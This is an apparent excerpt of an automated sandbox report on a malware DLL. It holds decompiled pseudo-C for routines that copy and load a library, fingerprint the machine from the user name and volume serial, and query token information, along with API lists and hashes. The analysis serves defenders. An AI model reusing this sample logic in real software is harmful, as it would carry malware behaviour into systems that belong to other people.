                                                                                                                                                                                                                0x1000a3b0
                                                                                                                                                                                                                0x1000a3b8
                                                                                                                                                                                                                0x1000a3cb
                                                                                                                                                                                                                0x1000a3d5
                                                                                                                                                                                                                0x1000a3de
                                                                                                                                                                                                                0x1000a3e4
                                                                                                                                                                                                                0x1000a3eb

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 1000B76A: _vsnwprintf.MSVCRT ref: 1000B787
                                                                                                                                                                                                                  • Part of subcall function 10009DC8: lstrcatW.KERNEL32(00000000,00000000), ref: 10009E07
                                                                                                                                                                                                                • CopyFileW.KERNELBASE(00000000,00000000,00000000), ref: 1000A386
                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE ref: 1000A392
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CopyFileLibraryLoad_vsnwprintflstrcat
                                                                                                                                                                                                                • String ID: %08x$dll
                                                                                                                                                                                                                • API String ID: 722183478-2963171978
                                                                                                                                                                                                                • Opcode ID: f72d2fc330ce88209f4c2237a74f7f65a0389a52750ff7e7d10f720e875abced
                                                                                                                                                                                                                • Instruction ID: c55651dfc9cb6555f84ec611fae2886d2378291d09008a97343f4257c843f593
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f72d2fc330ce88209f4c2237a74f7f65a0389a52750ff7e7d10f720e875abced
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 733184B6A403147BF740E7A4DC86F9B37ADDF85790F104166F504E7296DE34AE818760
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 177 1000a843-1000a86c call 1000d389 180 1000a872-1000a874 177->180 181 1000a86e-1000a870 177->181 182 1000a876 180->182 183 1000a884-1000a89d lstrlenW call 1000a73e 180->183 181->182 184 1000a878-1000a882 182->184 187 1000a8d4-1000a8dc 183->187 188 1000a89f-1000a8af call 1000d389 183->188 184->183 184->184 190 1000a8e2-1000a8e5 187->190 191 1000a9c6-1000a9d4 call 1000953b 187->191 196 1000a8b1-1000a8b5 188->196 197 1000a8b7-1000a8c1 188->197 194 1000a9b4-1000a9c4 call 1000953b 190->194 195 1000a8eb-1000a8ee 190->195 203 1000a9d5-1000a9d9 191->203 194->191 200 1000a8f5-1000a8f7 195->200 196->197 201 1000a8c3-1000a8cf lstrlenW 196->201 197->197 197->201 204 1000a8fd-1000a91b call 100096bf 200->204 205 1000a99f-1000a9ae 200->205 201->203 208 1000a927-1000a937 call 1000d038 204->208 209 1000a91d-1000a922 call 1000ea4b 204->209 205->190 205->194 213 1000a961-1000a964 208->213 214 1000a939-1000a950 call 1000aa02 208->214 209->208 216 1000a966-1000a968 213->216 217 1000a98f-1000a999 213->217 214->213 221 1000a952-1000a955 call 1000ab5a 214->221 219 1000a979-1000a989 216->219 220 1000a96a-1000a970 216->220 217->200 217->205 219->217 220->219 224 1000a95a-1000a95c 221->224 224->213 225 1000a95e-1000a960 224->225 225->213
                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E1000A843(WCHAR* __edx) {
                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                				WCHAR* _v24;
                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                				char _v29;
                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                				short _v44;
                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                				signed int _t57;
                                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                                				signed int _t62;
                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                				intOrPtr _t67;
                                                                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                				signed int _t72;
                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                				char _t80;
                                                                                                                                                                                                                				char _t94;
                                                                                                                                                                                                                				signed int _t96;
                                                                                                                                                                                                                				char _t97;
                                                                                                                                                                                                                				signed int _t98;
                                                                                                                                                                                                                				signed int _t99;
                                                                                                                                                                                                                				signed int _t100;
                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t95 = __edx;
                                                                                                                                                                                                                				_t80 = 0;
                                                                                                                                                                                                                				_v24 = __edx;
                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                				_t48 = E1000D389("document");
                                                                                                                                                                                                                				_t96 = _t48;
                                                                                                                                                                                                                				_v29 = 0;
                                                                                                                                                                                                                				_t98 = 0xf;
                                                                                                                                                                                                                				if(_t96 <= _t98) {
                                                                                                                                                                                                                					__eflags = _t96;
                                                                                                                                                                                                                					if(_t96 == 0) {
                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t96 = _t98;
                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                					_t94 = _t80;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						_t5 = _t94 + 0x41; // 0x41
                                                                                                                                                                                                                						 *((char*)(_t102 + _t94 - 0x28)) = _t5;
                                                                                                                                                                                                                						_t94 = _t94 + 1;
                                                                                                                                                                                                                					} while (_t94 < _t96);
                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                					lstrlenW( &_v44);
                                                                                                                                                                                                                					_t97 = E1000A73E( &_v20);
                                                                                                                                                                                                                					_v28 = _t97;
                                                                                                                                                                                                                					if(_t97 != 0) {
                                                                                                                                                                                                                						_t99 = _v20;
                                                                                                                                                                                                                						_v16 = _t80;
                                                                                                                                                                                                                						__eflags = _t99;
                                                                                                                                                                                                                						if(_t99 == 0) {
                                                                                                                                                                                                                							L27:
                                                                                                                                                                                                                							E1000953B( &_v28, _t80);
                                                                                                                                                                                                                							return _v8;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                							L11:
                                                                                                                                                                                                                							__eflags = _v8 - _t80;
                                                                                                                                                                                                                							if(_v8 != _t80) {
                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t100 = _v8;
                                                                                                                                                                                                                							_v12 = 1;
                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                								__eflags = _t100;
                                                                                                                                                                                                                								if(_t100 != 0) {
                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								E100096BF( &_v44, _t80, 0x10);
                                                                                                                                                                                                                								_t60 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                								_t103 = _t103 + 0xc;
                                                                                                                                                                                                                								__eflags =  *(_t60 + 0x1898) & 0x00000200;
                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                									E1000EA4B(_t80, _t95, __eflags);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t95 =  &_v44;
                                                                                                                                                                                                                								_t62 = E1000D038( *((intOrPtr*)(_t97 + _v16 * 4)),  &_v44); // executed
                                                                                                                                                                                                                								__eflags = _t62;
                                                                                                                                                                                                                								if(_t62 >= 0) {
                                                                                                                                                                                                                									_t95 =  &_v44;
                                                                                                                                                                                                                									_t71 = E1000AA02(0x100015c3,  &_v44, _v24, _v12); // executed
                                                                                                                                                                                                                									__eflags = _t71;
                                                                                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                                                                                										_t72 = E1000AB5A( &_v44, __eflags); // executed
                                                                                                                                                                                                                										__eflags = _t72;
                                                                                                                                                                                                                										if(_t72 != 0) {
                                                                                                                                                                                                                											_t100 = 1;
                                                                                                                                                                                                                											__eflags = 1;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								__eflags = _v44 - _t80;
                                                                                                                                                                                                                								if(_v44 != _t80) {
                                                                                                                                                                                                                									__eflags = _t100;
                                                                                                                                                                                                                									if(_t100 == 0) {
                                                                                                                                                                                                                										_t69 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                										 *((intOrPtr*)(_t69 + 0x114))(_v44, _t80);
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t65 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                									 *((intOrPtr*)(_t65 + 0x34))(_v40);
                                                                                                                                                                                                                									_t67 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                									 *((intOrPtr*)(_t67 + 0x34))(_v44);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t64 = _v12 + 1;
                                                                                                                                                                                                                								_v12 = _t64;
                                                                                                                                                                                                                								__eflags = _t64 - 2;
                                                                                                                                                                                                                							} while (_t64 <= 2);
                                                                                                                                                                                                                							_t57 = _v16 + 1;
                                                                                                                                                                                                                							_v8 = _t100;
                                                                                                                                                                                                                							_t99 = _v20;
                                                                                                                                                                                                                							_v16 = _t57;
                                                                                                                                                                                                                							__eflags = _t57 - _t99;
                                                                                                                                                                                                                							if(_t57 < _t99) {
                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                								goto L26;
                                                                                                                                                                                                                							} while (_t99 != 0);
                                                                                                                                                                                                                							goto L27;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                						E1000953B(_t97, 0xfffffffe);
                                                                                                                                                                                                                						_t97 = _t97 + 4;
                                                                                                                                                                                                                						_t99 = _t99 - 1;
                                                                                                                                                                                                                						__eflags = _t99;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t74 = E1000D389("simplify");
                                                                                                                                                                                                                					_v29 = _t80;
                                                                                                                                                                                                                					if(_t74 > _t98) {
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                							_t12 = _t80 + 0x41; // 0x41
                                                                                                                                                                                                                							 *((char*)(_t102 + _t80 - 0x28)) = _t12;
                                                                                                                                                                                                                							_t80 = _t80 + 1;
                                                                                                                                                                                                                						} while (_t80 < _t98);
                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                						lstrlenW( &_v44);
                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t98 = _t74;
                                                                                                                                                                                                                					if(_t98 == 0) {
                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}

































                                                                                                                                                                                                                0x1000a843
                                                                                                                                                                                                                0x1000a84c
                                                                                                                                                                                                                0x1000a84e
                                                                                                                                                                                                                0x1000a856
                                                                                                                                                                                                                0x1000a859
                                                                                                                                                                                                                0x1000a85c
                                                                                                                                                                                                                0x1000a864
                                                                                                                                                                                                                0x1000a866
                                                                                                                                                                                                                0x1000a869
                                                                                                                                                                                                                0x1000a86c
                                                                                                                                                                                                                0x1000a872
                                                                                                                                                                                                                0x1000a874
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a86e
                                                                                                                                                                                                                0x1000a86e
                                                                                                                                                                                                                0x1000a876
                                                                                                                                                                                                                0x1000a876
                                                                                                                                                                                                                0x1000a878
                                                                                                                                                                                                                0x1000a878
                                                                                                                                                                                                                0x1000a87b
                                                                                                                                                                                                                0x1000a87f
                                                                                                                                                                                                                0x1000a880
                                                                                                                                                                                                                0x1000a884
                                                                                                                                                                                                                0x1000a888
                                                                                                                                                                                                                0x1000a896
                                                                                                                                                                                                                0x1000a898
                                                                                                                                                                                                                0x1000a89d
                                                                                                                                                                                                                0x1000a8d4
                                                                                                                                                                                                                0x1000a8d7
                                                                                                                                                                                                                0x1000a8da
                                                                                                                                                                                                                0x1000a8dc
                                                                                                                                                                                                                0x1000a9c6
                                                                                                                                                                                                                0x1000a9cb
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a8e2
                                                                                                                                                                                                                0x1000a8e2
                                                                                                                                                                                                                0x1000a8e2
                                                                                                                                                                                                                0x1000a8e5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a8eb
                                                                                                                                                                                                                0x1000a8ee
                                                                                                                                                                                                                0x1000a8f5
                                                                                                                                                                                                                0x1000a8f5
                                                                                                                                                                                                                0x1000a8f7
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a904
                                                                                                                                                                                                                0x1000a909
                                                                                                                                                                                                                0x1000a90e
                                                                                                                                                                                                                0x1000a911
                                                                                                                                                                                                                0x1000a91b
                                                                                                                                                                                                                0x1000a922
                                                                                                                                                                                                                0x1000a922
                                                                                                                                                                                                                0x1000a92a
                                                                                                                                                                                                                0x1000a930
                                                                                                                                                                                                                0x1000a935
                                                                                                                                                                                                                0x1000a937
                                                                                                                                                                                                                0x1000a93c
                                                                                                                                                                                                                0x1000a947
                                                                                                                                                                                                                0x1000a94e
                                                                                                                                                                                                                0x1000a950
                                                                                                                                                                                                                0x1000a955
                                                                                                                                                                                                                0x1000a95a
                                                                                                                                                                                                                0x1000a95c
                                                                                                                                                                                                                0x1000a960
                                                                                                                                                                                                                0x1000a960
                                                                                                                                                                                                                0x1000a960
                                                                                                                                                                                                                0x1000a95c
                                                                                                                                                                                                                0x1000a950
                                                                                                                                                                                                                0x1000a961
                                                                                                                                                                                                                0x1000a964
                                                                                                                                                                                                                0x1000a966
                                                                                                                                                                                                                0x1000a968
                                                                                                                                                                                                                0x1000a96a
                                                                                                                                                                                                                0x1000a973
                                                                                                                                                                                                                0x1000a973
                                                                                                                                                                                                                0x1000a979
                                                                                                                                                                                                                0x1000a981
                                                                                                                                                                                                                0x1000a984
                                                                                                                                                                                                                0x1000a98c
                                                                                                                                                                                                                0x1000a98c
                                                                                                                                                                                                                0x1000a992
                                                                                                                                                                                                                0x1000a993
                                                                                                                                                                                                                0x1000a996
                                                                                                                                                                                                                0x1000a996
                                                                                                                                                                                                                0x1000a9a2
                                                                                                                                                                                                                0x1000a9a3
                                                                                                                                                                                                                0x1000a9a6
                                                                                                                                                                                                                0x1000a9a9
                                                                                                                                                                                                                0x1000a9ac
                                                                                                                                                                                                                0x1000a9ae
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a9b4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a9b4
                                                                                                                                                                                                                0x1000a9b4
                                                                                                                                                                                                                0x1000a9b7
                                                                                                                                                                                                                0x1000a9bd
                                                                                                                                                                                                                0x1000a9c1
                                                                                                                                                                                                                0x1000a9c1
                                                                                                                                                                                                                0x1000a9c1
                                                                                                                                                                                                                0x1000a8a4
                                                                                                                                                                                                                0x1000a8a9
                                                                                                                                                                                                                0x1000a8af
                                                                                                                                                                                                                0x1000a8b7
                                                                                                                                                                                                                0x1000a8b7
                                                                                                                                                                                                                0x1000a8b7
                                                                                                                                                                                                                0x1000a8ba
                                                                                                                                                                                                                0x1000a8be
                                                                                                                                                                                                                0x1000a8bf
                                                                                                                                                                                                                0x1000a8c3
                                                                                                                                                                                                                0x1000a8c7
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a8cd
                                                                                                                                                                                                                0x1000a8b1
                                                                                                                                                                                                                0x1000a8b5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a8b5

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000001), ref: 1000A888
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000001), ref: 1000A8C7
                                                                                                                                                                                                                  • Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: lstrlen$memset
                                                                                                                                                                                                                • String ID: document$simplify
                                                                                                                                                                                                                • API String ID: 3887242890-3319049627
                                                                                                                                                                                                                • Opcode ID: a0d654072406d2cf88ca564220ee3e8584bd0ac9625c12fa9a8df3b06a27825b
                                                                                                                                                                                                                • Instruction ID: 38bac404593f47c8c3d4ec902252394743ffc0b16ac7b4443815f8f3ec745690
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0d654072406d2cf88ca564220ee3e8584bd0ac9625c12fa9a8df3b06a27825b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A41B235D012199FEB01DBD4C8859ED7BF5EF4A3E0F254269E901B7249DB30ADC18BA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                			E1000D6D1(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                                				short _v528;
                                                                                                                                                                                                                				short _v1040;
                                                                                                                                                                                                                				short _v1552;
                                                                                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                                                                                				WCHAR* _t27;
                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                				long _t38;
                                                                                                                                                                                                                				WCHAR* _t43;
                                                                                                                                                                                                                				WCHAR* _t56;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t44 = __ecx;
                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                				_t43 = __edx;
                                                                                                                                                                                                                				_t56 = __ecx;
                                                                                                                                                                                                                				E100096BF(__edx, 0, 0x100);
                                                                                                                                                                                                                				_v12 = 0x100;
                                                                                                                                                                                                                				_t23 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                				 *((intOrPtr*)(_t23 + 0xc0))( &_v528,  &_v12);
                                                                                                                                                                                                                				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                                                                				_t27 = E1000948D(_t44, 0x78);
                                                                                                                                                                                                                				_v16 = _t27;
                                                                                                                                                                                                                				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                                                                                				_v8 = _v8 &  ~_t29;
                                                                                                                                                                                                                				E1000A291( &_v16);
                                                                                                                                                                                                                				_t33 = E1000D3A2(_t43);
                                                                                                                                                                                                                				E1000B76A( &(_t43[E1000D3A2(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                                                                				lstrcatW(_t43, _t56);
                                                                                                                                                                                                                				_t38 = E1000D3A2(_t43);
                                                                                                                                                                                                                				_v12 = _t38;
                                                                                                                                                                                                                				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                                                                				return E1000EEEC(_t43, E1000D3A2(_t43) + _t40, 0);
                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                0x1000d6d1
                                                                                                                                                                                                                0x1000d6da
                                                                                                                                                                                                                0x1000d6e6
                                                                                                                                                                                                                0x1000d6ec
                                                                                                                                                                                                                0x1000d6ee
                                                                                                                                                                                                                0x1000d6f6
                                                                                                                                                                                                                0x1000d704
                                                                                                                                                                                                                0x1000d709
                                                                                                                                                                                                                0x1000d718
                                                                                                                                                                                                                0x1000d720
                                                                                                                                                                                                                0x1000d72d
                                                                                                                                                                                                                0x1000d747
                                                                                                                                                                                                                0x1000d74c
                                                                                                                                                                                                                0x1000d74e
                                                                                                                                                                                                                0x1000d755
                                                                                                                                                                                                                0x1000d765
                                                                                                                                                                                                                0x1000d776
                                                                                                                                                                                                                0x1000d780
                                                                                                                                                                                                                0x1000d788
                                                                                                                                                                                                                0x1000d78f
                                                                                                                                                                                                                0x1000d792
                                                                                                                                                                                                                0x1000d7af

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1
                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000D718
                                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000D747
                                                                                                                                                                                                                  • Part of subcall function 1000B76A: _vsnwprintf.MSVCRT ref: 1000B787
                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00000114), ref: 1000D780
                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 1000D792
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 455400327-0
                                                                                                                                                                                                                • Opcode ID: 6807d17cbedc06270a25dc43d6def3b120d509b0ea666ffc790bda4984b7d484
                                                                                                                                                                                                                • Instruction ID: 59fefc39a5dd0a038c9dcbd64369fbb0134c561318443d00a0afe8b727768b80
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6807d17cbedc06270a25dc43d6def3b120d509b0ea666ffc790bda4984b7d484
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D92174B6E00214BFE700EBB4CC8AFAF77BCEF84250F104169F505E6195EA74AE458B61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 346 1000e47c-1000e49c GetTokenInformation 347 1000e4e2 346->347 348 1000e49e-1000e4a7 GetLastError 346->348 350 1000e4e4-1000e4e8 347->350 348->347 349 1000e4a9-1000e4b9 call 10009525 348->349 353 1000e4bb-1000e4bd 349->353 354 1000e4bf-1000e4d2 GetTokenInformation 349->354 353->350 354->347 355 1000e4d4-1000e4e0 call 1000953b 354->355 355->353
                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                			E1000E47C(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_push(_t22);
                                                                                                                                                                                                                				_push(_t22);
                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                				_t28 = __edx;
                                                                                                                                                                                                                				_t20 = _t22;
                                                                                                                                                                                                                				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                					_t12 = _t31;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t31 = E10009525(_v8);
                                                                                                                                                                                                                					_v12 = _t31;
                                                                                                                                                                                                                					if(_t31 != 0) {
                                                                                                                                                                                                                						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							E1000953B( &_v12, _t16);
                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                						_t12 = 0;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t12;
                                                                                                                                                                                                                			}










                                                                                                                                                                                                                0x1000e47f
                                                                                                                                                                                                                0x1000e480
                                                                                                                                                                                                                0x1000e487
                                                                                                                                                                                                                0x1000e48f
                                                                                                                                                                                                                0x1000e493
                                                                                                                                                                                                                0x1000e49c
                                                                                                                                                                                                                0x1000e4e2
                                                                                                                                                                                                                0x1000e4e2
                                                                                                                                                                                                                0x1000e4a9
                                                                                                                                                                                                                0x1000e4b1
                                                                                                                                                                                                                0x1000e4b3
                                                                                                                                                                                                                0x1000e4b9
                                                                                                                                                                                                                0x1000e4d2
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e4d4
                                                                                                                                                                                                                0x1000e4d9
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e4df
                                                                                                                                                                                                                0x1000e4bb
                                                                                                                                                                                                                0x1000e4bb
                                                                                                                                                                                                                0x1000e4bb
                                                                                                                                                                                                                0x1000e4bb
                                                                                                                                                                                                                0x1000e4b9
                                                                                                                                                                                                                0x1000e4e8

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000E4FD,00000000,00000000,?,1000E526), ref: 1000E497
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E49E
                                                                                                                                                                                                                  • Part of subcall function 10009525: RtlAllocateHeap.NTDLL(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533
                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E4CD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
